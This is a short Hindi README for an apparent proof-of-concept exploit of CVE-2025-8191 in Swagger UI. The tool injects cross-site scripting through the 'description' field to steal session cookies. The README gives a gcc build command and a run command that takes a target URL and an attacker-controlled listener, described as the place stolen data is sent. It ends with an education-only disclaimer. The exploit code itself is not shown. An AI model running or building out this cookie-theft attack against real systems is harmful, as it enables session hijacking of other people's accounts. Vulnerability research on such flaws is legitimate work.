
एक रिपॉजिटरी जिसमें Swagger UI में CVE‑2025‑8191 का PoC एक्सप्लॉइट शामिल है, जो सेशन कुकीज़ को चुराने के लिए XSS इंजेक्शन का उपयोग करता है।
यह रिपॉजिटरी CVE‑2025‑8191 के लिए एक प्रूफ‑ऑफ‑कॉन्सेप्ट (PoC) एक्सप्लॉइट प्रदान करती है, जो Swagger UI में पाई गई एक भेद्यता है।
यह भेद्यता “description” फ़ील्ड में क्रॉस‑साइट स्क्रिप्टिंग (XSS) इंजेक्शन की अनुमति देती है, जो Swagger UI संस्करण ≤ 1.0.3 के तहत रिमोट स्क्रिप्ट निष्पादन का कारण बनती है।
gcc exploit.c argparse.c -o exploit -lcurl
./exploit -u http://target.com -s http://yourserver.com -v
http://target.com को लक्ष्य Swagger UI URL से बदलें, और http://yourserver.com को अपने HTTP लिसनर से बदलें, जो एक्सफिल्ट्रेशन के लिए है।
यह कोड केवल शैक्षिक और सुरक्षा‑अनुसंधान उद्देश्यों के लिए है। इसे उन सिस्टमों पर उपयोग न करें जिनके लिए आपके पास स्पष्ट अनुमति नहीं है। लेखक किसी भी दुरुपयोग के लिए जिम्मेदार नहीं है।
MIT लाइसेंस